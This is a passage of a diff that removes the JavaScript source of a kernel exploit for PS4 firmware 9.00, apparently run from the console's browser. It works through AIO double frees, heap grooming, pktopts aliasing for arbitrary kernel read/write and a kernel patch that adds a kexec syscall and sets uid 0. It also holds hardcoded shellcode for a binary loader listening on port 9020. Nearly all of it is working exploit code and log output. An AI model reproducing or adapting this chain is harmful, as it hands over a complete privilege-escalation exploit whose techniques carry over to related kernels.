-        get_rthdr(sd, buf);
-        const state = buf.read32(reqs2_off + 0x38);
-        if (state === AIO_STATE_ABORTED) {
-            log(`found target_id at batch: ${i / num_elems}`);
-
-            target_id = new Word(leak_ids[i]);
-            leak_ids[i] = 0;
-            log(`target_id: ${hex(target_id)}`);
-
-            const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
-            log('leaked aio_entry:');
-            hexdump(reqs2);
-
-            const start = i + num_elems;
-            to_cancel_p = leak_ids.addr_at(start);
-            to_cancel_len = leak_ids_len - start;
-            break;
-        }
-    }
-    if (target_id === null) {
-        die('target_id not found');
-    }
-
-    cancel_aios(to_cancel_p, to_cancel_len);
-    free_aios2(leak_ids_p, leak_ids_len);
-
-    return [reqs1_addr, kbuf_addr, kernel_addr, target_id, evf];
-}
-
-// FUNCTIONS FOR STAGE: 0x100 MALLOC ZONE DOUBLE FREE
-
-function make_aliased_pktopts(sds) {
-    const tclass = new Word();
-    for (let loop = 0; loop < num_alias; loop++) {
-        for (let i = 0; i < num_sds; i++) {
-            tclass[0] = i;
-            ssockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
-        }
-
-        for (let i = 0; i < sds.length; i++) {
-            gsockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
-            const marker = tclass[0];
-            if (marker !== i) {
-                log(`aliased pktopts at attempt: ${loop}`);
-                const pair = [sds[i], sds[marker]];
-                log(`found pair: ${pair}`);
-                sds.splice(marker, 1);
-                sds.splice(i, 1);
-                // add pktopts to the new sockets now while new allocs can't
-                // use the double freed memory
-                for (let i = 0; i < 2; i++) {
-                    const sd = new_socket();
-                    ssockopt(sd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
-                    sds.push(sd);
-                }
-
-                return pair;
-            }
-        }
-
-        for (let i = 0; i < num_sds; i++) {
-            setsockopt(sds[i], IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0, 0);
-        }
-    }
-    die('failed to make aliased pktopts');
-}
-
-function double_free_reqs1(
-    reqs1_addr, kbuf_addr, target_id, evf, sd, sds,
-) {
-    const max_leak_len = (0xff + 1) << 3;
-    const buf = new Buffer(max_leak_len);
-
-    const num_elems = max_aio_ids;
-    const aio_reqs = make_reqs1(num_elems);
-    const aio_reqs_p = aio_reqs.addr;
-
-    const num_batches = 2;
-    const aio_ids_len = num_batches * num_elems;
-    const aio_ids = new View4(aio_ids_len);
-    const aio_ids_p = aio_ids.addr;
-
-    log('start overwrite rthdr with AIO queue entry loop');
-    let aio_not_found = true;
-    free_evf(evf);
-    for (let i = 0; i < num_clobbers; i++) {
-        spray_aio(num_batches, aio_reqs_p, num_elems, aio_ids_p);
-
-        if (get_rthdr(sd, buf) === 8 && buf.read32(0) === AIO_CMD_READ) {
-            log(`aliased at attempt: ${i}`);
-            aio_not_found = false;
-            cancel_aios(aio_ids_p, aio_ids_len);
-            break;
-        }
-
-        free_aios(aio_ids_p, aio_ids_len);
-    }
-    if (aio_not_found) {
-        die('failed to overwrite rthdr');
-    }
-
-    const reqs2 = new Buffer(0x80);
-    const rsize = build_rthdr(reqs2, reqs2.size);
-    // .ar2_ticket
-    reqs2.write32(4, 5);
-    // .ar2_info
-    reqs2.write64(0x18, reqs1_addr);
-    // craft a aio_batch using the end portion of the buffer
-    const reqs3_off = 0x28;
-    // .ar2_batch
-    reqs2.write64(0x20, kbuf_addr.add(reqs3_off));
-
-    // [.ar3_num_reqs, .ar3_reqs_left] aliases .ar2_spinfo
-    // safe since free_queue_entry() doesn't deref the pointer
-    reqs2.write32(reqs3_off, 1);
-    reqs2.write32(reqs3_off + 4, 0);
-    // [.ar3_state, .ar3_done] aliases .ar2_result.returnValue
-    reqs2.write32(reqs3_off + 8, AIO_STATE_COMPLETE);
-    reqs2[reqs3_off + 0xc] = 0;
-    // .ar3_lock aliases .ar2_qentry (rest of the buffer is padding)
-    // safe since the entry already got dequeued
-    //
-    // .ar3_lock.lock_object.lo_flags = (
-    //     LO_SLEEPABLE | LO_UPGRADABLE
-    //     | LO_RECURSABLE | LO_DUPOK | LO_WITNESS
-    //     | 6 << LO_CLASSSHIFT
-    //     | LO_INITIALIZED
-    // )
-    reqs2.write32(reqs3_off + 0x28, 0x67b0000);
-    // .ar3_lock.lk_lock = LK_UNLOCKED
-    reqs2.write64(reqs3_off + 0x38, 1);
-
-    const states = new View4(num_elems);
-    const states_p = states.addr;
-    const addr_cache = [aio_ids_p];
-    for (let i = 1; i < num_batches; i++) {
-        addr_cache.push(aio_ids_p.add((i * num_elems) << 2));
-    }
-
-    log('start overwrite AIO queue entry with rthdr loop');
-    let req_id = null;
-    close(sd);
-    sd = null;
-    loop: for (let i = 0; i < num_alias; i++) {
-        for (const sd of sds) {
-            set_rthdr(sd, reqs2, rsize);
-        }
-
-        for (let batch = 0; batch < addr_cache.length; batch++) {
-            states.fill(-1);
-            aio_multi_cancel(addr_cache[batch], num_elems, states_p);
-
-            const req_idx = states.indexOf(AIO_STATE_COMPLETE);
-            if (req_idx !== -1) {
-                log(`req_idx: ${req_idx}`);
-                log(`found req_id at batch: ${batch}`);
-                log(`states: ${[...states].map(e => hex(e))}`);
-                log(`states[${req_idx}]: ${hex(states[req_idx])}`);
-                log(`aliased at attempt: ${i}`);
-
-                const aio_idx = batch*num_elems + req_idx;
-                req_id = new Word(aio_ids[aio_idx]);
-                log(`req_id: ${hex(req_id)}`);
-                aio_ids[aio_idx] = 0;
-
-                // set .ar3_done to 1
-                poll_aio(req_id, states);
-                log(`states[${req_idx}]: ${hex(states[0])}`);
-                for (let i = 0; i < num_sds; i++) {
-                    const sd2 = sds[i];
-                    get_rthdr(sd2, reqs2);
-                    const done = reqs2[reqs3_off + 0xc];
-                    if (done) {
-                        hexdump(reqs2);
-                        sd = sd2;
-                        sds.splice(i, 1);
-                        free_rthdrs(sds);
-                        sds.push(new_socket());
-                        break;
-                    }
-                }
-                if (sd === null) {
-                    die("can't find sd that overwrote AIO queue entry");
-                }
-                log(`sd: ${sd}`);
-
-                break loop;
-            }
-        }
-    }
-    if (req_id === null) {
-        die('failed to overwrite AIO queue entry');
-    }
-    free_aios2(aio_ids_p, aio_ids_len);
-
-    // enable deletion of target_id
-    poll_aio(target_id, states);
-    log(`target's state: ${hex(states[0])}`);
-
-    const sce_errs = new View4([-1, -1]);
-    const target_ids = new View4([req_id, target_id]);
-    // PANIC: double free on the 0x100 malloc zone. important kernel data may
-    // alias
-    aio_multi_delete(target_ids.addr, 2, sce_errs.addr);
-
-    // we reclaim first since the sanity checking here is longer which makes it
-    // more likely that we have another process claim the memory
-    try {
-        // RESTORE: double freed memory has been reclaimed with harmless data
-        // PANIC: 0x100 malloc zone pointers aliased
-        const sd_pair = make_aliased_pktopts(sds);
-        return [sd_pair, sd];
-    } finally {
-        log(`delete errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
-
-        states[0] = -1;
-        states[1] = -1;
-        poll_aio(target_ids, states);
-        log(`target states: ${hex(states[0])}, ${hex(states[1])}`);
-
-        const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
-        let success = true;
-        if (states[0] !== SCE_KERNEL_ERROR_ESRCH) {
-            log('ERROR: bad delete of corrupt AIO request');
-            success = false;
-        }
-        if (sce_errs[0] !== 0 || sce_errs[0] !== sce_errs[1]) {
-            log('ERROR: bad delete of ID pair');
-            success = false;
-        }
-
-        if (!success) {
-            die('ERROR: double free on a 0x100 malloc zone failed');
-        }
-    }
-}
-
-// FUNCTIONS FOR STAGE: MAKE ARBITRARY KERNEL READ/WRITE
-
-// k100_addr is double freed 0x100 malloc zone address
-// dirty_sd is the socket whose rthdr pointer is corrupt
-// kernel_addr is the address of the "evf cv" string
-function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
-    const psd = pktopts_sds[0];
-    const tclass = new Word();
-    const off_tclass = is_ps4 ? 0xb0 : 0xc0;
-
-    const pktopts = new Buffer(0x100);
-    const rsize = build_rthdr(pktopts, pktopts.size);
-    const pktinfo_p = k100_addr.add(0x10);
-    // pktopts.ip6po_pktinfo = &pktopts.ip6po_pktinfo
-    pktopts.write64(0x10, pktinfo_p);
-
-    log('overwrite main pktopts');
-    let reclaim_sd = null;
-    close(pktopts_sds[1]);
-    for (let i = 0; i < num_alias; i++) {
-        for (let i = 0; i < num_sds; i++) {
-            // if a socket doesn't have a pktopts, setting the rthdr will make
-            // one. the new pktopts might reuse the memory instead of the
-            // rthdr. make sure the sockets already have a pktopts before
-            pktopts.write32(off_tclass, 0x4141 | i << 16);
-            set_rthdr(sds[i], pktopts, rsize);
-        }
-
-        gsockopt(psd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
-        const marker = tclass[0];
-        if ((marker & 0xffff) === 0x4141) {
-            log(`found reclaim sd at attempt: ${i}`);
-            const idx = marker >>> 16;
-            reclaim_sd = sds[idx];
-            sds.splice(idx, 1);
-            break;
-        }
-    }
-    if (reclaim_sd === null) {
-        die('failed to overwrite main pktopts');
-    }
-
-    const pktinfo = new Buffer(0x14);
-    pktinfo.write64(0, pktinfo_p);
-    const nhop = new Word();
-    const nhop_p = nhop.addr;
-    const read_buf = new Buffer(8);
-    const read_buf_p = read_buf.addr;
-    function kread64(addr) {
-        const len = 8;
-        let offset = 0;
-        while (offset < len) {
-            // pktopts.ip6po_nhinfo = addr + offset
-            pktinfo.write64(8, addr.add(offset));
-            nhop[0] = len - offset;
-
-            ssockopt(psd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
-            sysi(
-                'getsockopt',
-                psd, IPPROTO_IPV6, IPV6_NEXTHOP,
-                read_buf_p.add(offset), nhop_p,
-            );
-
-            const n = nhop[0];
-            if (n === 0) {
-                read_buf[offset] = 0;
-                offset += 1;
-            } else {
-                offset += n;
-            }
-        }
-        return read_buf.read64(0);
-    }
-
-    log(`kread64(&"evf cv"): ${kread64(kernel_addr)}`);
-    const kstr = jstr(read_buf);
-    log(`*(&"evf cv"): ${kstr}`);
-    if (kstr !== 'evf cv') {
-        die('test read of &"evf cv" failed');
-    }
-
-    // Only For PS4 9.00
-
-    const off_kstr = 0x7f6f27;
-    const kbase = kernel_addr.sub(off_kstr);
-    log(`kernel base: ${kbase}`);
-
-    log('\nmaking arbitrary kernel read/write');
-    const cpuid = 7 - main_core;
-    const off_cpuid_to_pcpu = 0x21ef2a0;
-    const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid*8);
-    log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`);
-    const pcpu = kread64(pcpu_p);
-    log(`pcpu: ${pcpu}`);
-    log(`cpuid: ${kread64(pcpu.add(0x30)).hi}`);
-    // __pcpu[cpuid].pc_curthread
-    const td = kread64(pcpu);
-    log(`td: ${td}`);
-
-    const off_td_proc = 8;
-    const proc = kread64(td.add(off_td_proc));
-    log(`proc: ${proc}`);
-    const pid = sysi('getpid');
-    log(`our pid: ${pid}`);
-    const pid2 = kread64(proc.add(0xb0)).lo;
-    log(`suspected proc pid: ${pid2}`);
-    if (pid2 !== pid) {
-        die('process not found');
-    }
-
-    const off_p_fd = 0x48;
-    const p_fd = kread64(proc.add(off_p_fd));
-    log(`proc.p_fd: ${p_fd}`);
-    // curthread->td_proc->p_fd->fd_ofiles
-    const ofiles = kread64(p_fd);
-    log(`ofiles: ${ofiles}`);
-
-    const off_p_ucred = 0x40;
-    const p_ucred = kread64(proc.add(off_p_ucred));
-    log(`p_ucred ${p_ucred}`);
-
-    const pipes = new View4(2);
-    sysi('pipe', pipes.addr);
-    const pipe_file = kread64(ofiles.add(pipes[0] * 8));
-    log(`pipe file: ${pipe_file}`);
-    // ofiles[pipe_fd].f_data
-    const kpipe = kread64(pipe_file);
-    log(`pipe pointer: ${kpipe}`);
-
-    const pipe_save = new Buffer(0x18); // sizeof struct pipebuf
-    for (let off = 0; off < pipe_save.size; off += 8) {
-        pipe_save.write64(off, kread64(kpipe.add(off)));
-    }
-
-    const main_sd = psd;
-    const worker_sd = dirty_sd;
-
-    const main_file = kread64(ofiles.add(main_sd * 8));
-    log(`main sock file: ${main_file}`);
-    // ofiles[sd].f_data
-    const main_sock = kread64(main_file);
-    log(`main sock pointer: ${main_sock}`);
-    // socket.so_pcb (struct inpcb *)
-    const m_pcb = kread64(main_sock.add(0x18));
-    log(`main sock pcb: ${m_pcb}`);
-    // inpcb.in6p_outputopts
-    const m_pktopts = kread64(m_pcb.add(0x118));
-    log(`main pktopts: ${m_pktopts}`);
-    log(`0x100 malloc zone pointer: ${k100_addr}`);
-
-    if (m_pktopts.ne(k100_addr)) {
-        die('main pktopts pointer != leaked pktopts pointer');
-    }
-
-    // ofiles[sd].f_data
-    const reclaim_sock = kread64(kread64(ofiles.add(reclaim_sd * 8)));
-    log(`reclaim sock pointer: ${reclaim_sock}`);
-    // socket.so_pcb (struct inpcb *)
-    const r_pcb = kread64(reclaim_sock.add(0x18));
-    log(`reclaim sock pcb: ${r_pcb}`);
-    // inpcb.in6p_outputopts
-    const r_pktopts = kread64(r_pcb.add(0x118));
-    log(`reclaim pktopts: ${r_pktopts}`);
-
-    // ofiles[sd].f_data
-    const worker_sock = kread64(kread64(ofiles.add(worker_sd * 8)));
-    log(`worker sock pointer: ${worker_sock}`);
-    // socket.so_pcb (struct inpcb *)
-    const w_pcb = kread64(worker_sock.add(0x18));
-    log(`worker sock pcb: ${w_pcb}`);
-    // inpcb.in6p_outputopts
-    const w_pktopts = kread64(w_pcb.add(0x118));
-    log(`worker pktopts: ${w_pktopts}`);
-
-    // get restricted read/write with pktopts pair
-    // main_pktopts.ip6po_pktinfo = &worker_pktopts.ip6po_pktinfo
-    const w_pktinfo = w_pktopts.add(0x10);
-    pktinfo.write64(0, w_pktinfo);
-    pktinfo.write64(8, 0); // clear .ip6po_nexthop
-    ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
-
-    pktinfo.write64(0, kernel_addr);
-    ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
-    gsockopt(worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
-    const kstr2 = jstr(pktinfo);
-    log(`*(&"evf cv"): ${kstr2}`);
-    if (kstr2 !== 'evf cv') {
-        die('pktopts read failed');
-    }
-    log('achieved restricted kernel read/write');
-
-    // in6_pktinfo.ipi6_ifindex must be 0 (or a valid interface index) when
-    // using pktopts write. we can safely modify a pipe even with this limit so
-    // we corrupt that instead for arbitrary read/write. pipe.pipe_map will be
-    // clobbered with zeros but that's okay
-    class KernelMemory {
-        constructor(main_sd, worker_sd, pipes, pipe_addr) {
-            this.main_sd = main_sd;
-            this.worker_sd = worker_sd;
-            this.rpipe = pipes[0];
-            this.wpipe = pipes[1];
-            this.pipe_addr = pipe_addr; // &pipe.pipe_buf
-            this.pipe_addr2 = pipe_addr.add(0x10); // &pipe.pipe_buf.buffer
-            this.rw_buf = new Buffer(0x14);
-            this.addr_buf = new Buffer(0x14);
-            this.data_buf = new Buffer(0x14);
-            this.data_buf.write32(0xc, 0x40000000);
-        }
-
-        _verify_len(len) {
-            if (!(Number.isInteger(len) && (0 <= len <= 0xffffffff))) {
-                throw TypeError('len not a 32-bit unsigned integer');
-            }
-        }
-
-        copyin(src, dst, len) {
-            this._verify_len(len);
-            const main = this.main_sd;
-            const worker = this.worker_sd;
-            const addr_buf = this.addr_buf;
-            const data_buf = this.data_buf;
-
-            addr_buf.write64(0, this.pipe_addr);
-            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
-            data_buf.write64(0, 0);
-            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
-
-            addr_buf.write64(0, this.pipe_addr2);
-            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
-            addr_buf.write64(0, dst);
-            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
-            sysi('write', this.wpipe, src, len);
-        }
-
-        copyout(src, dst, len) {
-            this._verify_len(len);
-            const main = this.main_sd;
-            const worker = this.worker_sd;
-            const addr_buf = this.addr_buf;
-            const data_buf = this.data_buf;
-
-            addr_buf.write64(0, this.pipe_addr);
-            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
-            data_buf.write32(0, 0x40000000);
-            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
-
-            addr_buf.write64(0, this.pipe_addr2);
-            ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
-            addr_buf.write64(0, src);
-            ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
-
-            sysi('read', this.rpipe, dst, len);
-        }
-
-        _read(addr) {
-            const buf = this.rw_buf;
-            buf.write64(0, addr);
-            buf.fill(0, 8);
-            ssockopt(this.main_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
-            gsockopt(this.worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, buf);
-        }
-
-        read32(addr) {
-            this._read(addr);
-            return this.rw_buf.read32(0);
-        }
-
-        read64(addr) {
-            this._read(addr);
-            return this.rw_buf.read64(0);
-        }
-
-        write32(addr, value) {
-            this.rw_buf.write32(0, value);
-            this.copyin(this.rw_buf.addr, addr, 4);
-        }
-
-        write64(addr, value) {
-            this.rw_buf.write64(0, value);
-            this.copyin(this.rw_buf.addr, addr, 8);
-        }
-    }
-    const kmem = new KernelMemory(main_sd, worker_sd, pipes, kpipe);
-
-    const kstr3_buf = new Buffer(8);
-    kmem.copyout(kernel_addr, kstr3_buf.addr, kstr3_buf.size);
-    const kstr3 = jstr(kstr3_buf);
-    log(`*(&"evf cv"): ${kstr3}`);
-    if (kstr3 !== 'evf cv') {
-        die('pipe read failed');
-    }
-    log('achieved arbitrary kernel read/write');
-
-    // RESTORE: clean corrupt pointer
-     // pktopts.ip6po_rthdr = NULL
-     //ABC Patch
-     const off_ip6po_rthdr = 0x68;
-     const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
-     const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
-     kmem.write64(r_rthdr_p, 0);
-     kmem.write64(w_rthdr_p, 0);
-     log('corrupt pointers cleaned');
-
-    /*
-    // REMOVE once restore kernel is ready for production
-    // increase the ref counts to prevent deallocation
-    kmem.write32(main_sock, kmem.read32(main_sock) + 1);
-    kmem.write32(worker_sock, kmem.read32(worker_sock) + 1);
-    // +2 since we have to take into account the fget_write()'s reference
-    kmem.write32(pipe_file.add(0x28), kmem.read32(pipe_file.add(0x28)) + 2);*/
-    
-    return [kbase, kmem, p_ucred, [kpipe, pipe_save, pktinfo_p, w_pktinfo]];
-}
-
-// FUNCTIONS FOR STAGE: PATCH KERNEL
-
-async function get_patches(url) {
-    const response = await fetch(url);
-    if (!response.ok) {
-        throw Error(
-            `Network response was not OK, status: ${response.status}\n`
-            + `failed to fetch: ${url}`);
-    }
-    return response.arrayBuffer();
-}
-
-// 9.00 supported only
-async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
-    if (!is_ps4) {
-        throw RangeError('PS5 kernel patching unsupported');
-    }
-    if (!(0x800 <= version < 0x900)) {
-        throw RangeError('kernel patching unsupported');
-    }
-
-    log('change sys_aio_submit() to sys_kexec()');
-    // sysent[661] is unimplemented so free for use
-    const offset_sysent_661 = 0x1107f00;
-    const sysent_661 = kbase.add(offset_sysent_661);
-    // .sy_narg = 6
-    kmem.write32(sysent_661, 6);
-    // .sy_call = gadgets['jmp qword ptr [rsi]']
-    kmem.write64(sysent_661.add(8), kbase.add(0x4c7ad));
-    // .sy_thrcnt = SY_THR_STATIC
-    kmem.write32(sysent_661.add(0x2c), 1);
-
-    log('add JIT capabilities');
-    // TODO just set the bits for JIT privs
-    // cr_sceCaps[0]
-    kmem.write64(p_ucred.add(0x60), -1);
-    // cr_sceCaps[1]
-    kmem.write64(p_ucred.add(0x68), -1);
-
-    const buf = await get_patches('./kpatch/900.elf');
-    // FIXME handle .bss segment properly
-    // assume start of loadable segments is at offset 0x1000
-    const patches = new View1(await buf, 0x1000);
-    let map_size = patches.size;
-    const max_size = 0x10000000;
-    if (map_size > max_size) {
-        die(`patch file too large (>${max_size}): ${map_size}`);
-    }
-    if (map_size === 0) {
-        die('patch file size is zero');
-    }
-    map_size = map_size+page_size & -page_size;
-
-    const prot_rwx = 7;
-    const prot_rx = 5;
-    const prot_rw = 3;
-    const exec_p = new Int(0, 9);
-    const write_p = new Int(max_size, 9);
-    const exec_fd = sysi('jitshm_create', 0, map_size, prot_rwx);
-    const write_fd = sysi('jitshm_alias', exec_fd, prot_rw);
-
-    const exec_addr = chain.sysp(
-        'mmap',
-        exec_p,
-        map_size,
-        prot_rx,
-        MAP_SHARED|MAP_FIXED,
-        exec_fd,
-        0,
-    );
-    const write_addr = chain.sysp(
-        'mmap',
-        write_p,
-        map_size,
-        prot_rw,
-        MAP_SHARED|MAP_FIXED,
-        write_fd,
-        0,
-    );
-
-    log(`exec_addr: ${exec_addr}`);
-    log(`write_addr: ${write_addr}`);
-    if (exec_addr.ne(exec_p) || write_addr.ne(write_p)) {
-        die('mmap() for jit failed');
-    }
-
-    log('mlock exec_addr for kernel exec');
-    sysi('mlock', exec_addr, map_size);
-
-    // mov eax, 0x1337; ret (0xc300_0013_37b8)
-    const test_code = new Int(0x001337b8, 0xc300);
-    write_addr.write64(0, test_code);
-
-    log('test jit exec');
-    sys_void('kexec', exec_addr);
-    let retval = chain.errno;
-    log('returned successfully');
-
-    log(`jit retval: ${retval}`);
-    if (retval !== 0x1337) {
-        die('test jit exec failed');
-    }
-
-    const pipe_save = restore_info[1];
-    restore_info[1] = pipe_save.addr;
-    log('mlock pipe save data for kernel restore');
-    sysi('mlock', restore_info[1], page_size);
-
-    mem.cpy(write_addr, patches.addr, patches.size);
-    sys_void('kexec', exec_addr, ...restore_info);
-
-    log('setuid(0)');
-    sysi('setuid', 0);
-    log('kernel exploit succeeded!');
-    localStorage.ExploitLoaded="yes"
-    sessionStorage.ExploitLoaded="yes"
-    //alert("kernel exploit succeeded!");
-}
-
-
-
-// FUNCTIONS FOR STAGE: SETUP
-
-function setup(block_fd) {
-    // this part will block the worker threads from processing entries so that
-    // we may cancel them instead. this is to work around the fact that
-    // aio_worker_entry2() will fdrop() the file associated with the aio_entry
-    // on ps5. we want aio_multi_delete() to call fdrop()
-    log('block AIO');
-    const reqs1 = new Buffer(0x28 * num_workers);
-    const block_id = new Word();
-
-    for (let i = 0; i < num_workers; i++) {
-        reqs1.write32(8 + i*0x28, 1);
-        reqs1.write32(0x20 + i*0x28, block_fd);
-    }
-    aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
-
-    {
-        const reqs1 = make_reqs1(1);
-        const timo = new Word(1);
-        const id = new Word();
-        aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
-        chain.do_syscall_clear_errno(
-            'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
-        const err = chain.errno;
-        if (err !== 60) { // ETIMEDOUT
-            die(`SceAIO system not blocked. errno: ${err}`);
-        }
-        free_aios(id.addr, 1);
-    }
-
-    log('heap grooming');
-    // chosen to maximize the number of 0x80 malloc allocs per submission
-    const num_reqs = 3;
-    const groom_ids = new View4(num_grooms);
-    const groom_ids_p = groom_ids.addr;
-    const greqs = make_reqs1(num_reqs);
-    // allocate enough so that we start allocating from a newly created slab
-    spray_aio(num_grooms, greqs.addr, num_reqs, groom_ids_p, false);
-    cancel_aios(groom_ids_p, num_grooms);        
-    return [block_id, groom_ids];
-}
-
-function runBinLoader() {
-    var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
-    var payload_loader = malloc32(0x1000);
-    var BLDR = payload_loader.backing;
-    BLDR[0]  = 0x56415741;  BLDR[1]  = 0x83485541;  BLDR[2]  = 0x894818EC;
-    BLDR[3]  = 0xC748243C;  BLDR[4]  = 0x10082444;  BLDR[5]  = 0x483C2302;
-    BLDR[6]  = 0x102444C7;  BLDR[7]  = 0x00000000;  BLDR[8]  = 0x000002BF;
-    BLDR[9]  = 0x0001BE00;  BLDR[10] = 0xD2310000;  BLDR[11] = 0x00009CE8;
-    BLDR[12] = 0xC7894100;  BLDR[13] = 0x8D48C789;  BLDR[14] = 0xBA082474;
-    BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8;  BLDR[17] = 0xFF894400;
-    BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800;  BLDR[20] = 0x89440000;
-    BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2;  BLDR[23] = 0x89410000;
-    BLDR[24] = 0x2C8B4CC6;  BLDR[25] = 0x45C64124;  BLDR[26] = 0x05EBC300;
-    BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
-    BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
-    BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
-    BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
-    BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
-    BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
-    BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
-    BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
-    BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
-    BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
-    BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
-    BLDR[60] = 0xC3050FCA;
-
-    chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
-
-    var pthread = malloc(0x10);
-    sysi('mlock', payload_buffer, 0x300000);
-
-    call_nze(
-        'pthread_create',
-        pthread,
-        0,
-        payload_loader,
-        payload_buffer
-    );
-
-    log('GoldHEN Already Loaded, BinLoader Is Ready. Send A Payload To Port 9020 Now');
-}
-
-// overview:
-// * double free a aio_entry (resides at a 0x80 malloc zone)
-// * type confuse a evf and a ip6_rthdr
-// * use evf/rthdr to read out the contents of the 0x80 malloc zone
-// * leak a address in the 0x100 malloc zone
-// * write the leaked address to a aio_entry
-// * double free the leaked address
-// * corrupt a ip6_pktopts for restricted r/w
-// * corrupt a pipe for arbitrary r/w
-//
-// the exploit implementation also assumes that we are pinned to one core
-export async function kexploit() {
-    const _init_t1 = performance.now();
-    await init();
-    const _init_t2 = performance.now();
-
-    try {
-       chain.sys('setuid', 0);
-    } catch (e) {
-        localStorage.ExploitLoaded = "no";
-    }
-    
-    if (localStorage.ExploitLoaded === "yes" && sessionStorage.ExploitLoaded!="yes") {
-            runBinLoader();
-            return new Promise(() => {});
-    }
-
-    // If setuid is successful, we dont need to run the kexploit again
-    try {
-        if (sysi('setuid', 0) == 0) {
-            log("Not running kexploit again.")
-            return;
-        }
-    }
-    catch (e) {}
-
-    // fun fact:
-    // if the first thing you do since boot is run the web browser, WebKit can
-    // use all the cores
-    const main_mask = new Long();
-    get_our_affinity(main_mask);
-    log(`main_mask: ${main_mask}`);
-
-    // pin to 1 core so that we only use 1 per-cpu bucket. this will make heap
-    // spraying and grooming easier
-    log(`pinning process to core #${main_core}`);
-    set_our_affinity(new Long(1 << main_core));
-    get_our_affinity(main_mask);
-    log(`main_mask: ${main_mask}`);
-
-    log("setting main thread's priority");
-    sysi('rtprio_thread', RTP_SET, 0, rtprio.addr);
-
-    const [block_fd, unblock_fd] = (() => {
-        const unix_pair = new View4(2);
-        sysi('socketpair', AF_UNIX, SOCK_STREAM, 0, unix_pair.addr);
-        return unix_pair;
-    })();
-
-    const sds = [];
-    for (let i = 0; i < num_sds; i++) {
-        sds.push(new_socket());
-    }
-
-    let block_id = null;
-    let groom_ids = null;
-    try {
-        log('STAGE: Setup');
-        [block_id, groom_ids] = setup(block_fd);
-
-        log('\nSTAGE: Double free AIO queue entry');
-        const sd_pair = double_free_reqs2(sds);
-
-        log('\nSTAGE: Leak kernel addresses');
-        const [
-            reqs1_addr, kbuf_addr, kernel_addr, target_id, evf,
-        ] = leak_kernel_addrs(sd_pair);
-
-        log('\nSTAGE: Double free SceKernelAioRWRequest');
-        const [pktopts_sds, dirty_sd] = double_free_reqs1(
-            reqs1_addr, kbuf_addr, target_id, evf, sd_pair[0], sds,
-        );
-
-        log('\nSTAGE: Get arbitrary kernel read/write');
-        const [kbase, kmem, p_ucred, restore_info] = make_kernel_arw(
-            pktopts_sds, dirty_sd, reqs1_addr, kernel_addr, sds);
-
-        log('\nSTAGE: Patch kernel');
-        await patch_kernel(kbase, kmem, p_ucred, restore_info);
-        
-    } finally {
-        close(unblock_fd);
-
-        const t2 = performance.now();
-        const ftime = t2 - t1;
-        const init_time = _init_t2 - _init_t1;
-        log('\ntime (include init): ' + (ftime) / 1000);
-        log('kex time: ' + (t2 - _init_t2) / 1000);
-        log('init time: ' + (init_time) / 1000);
-        log('time to init: ' + (_init_t1 - t1) / 1000);
-        log('time - init time: ' + (ftime - init_time) / 1000);
-    }
-    close(block_fd);
-    free_aios2(groom_ids.addr, groom_ids.length);
-    aio_multi_wait(block_id.addr, 1);
-    aio_multi_delete(block_id.addr, block_id.length);
-    for (const sd of sds) {
-        close(sd);
-    }
-}
-
-function malloc(sz) {
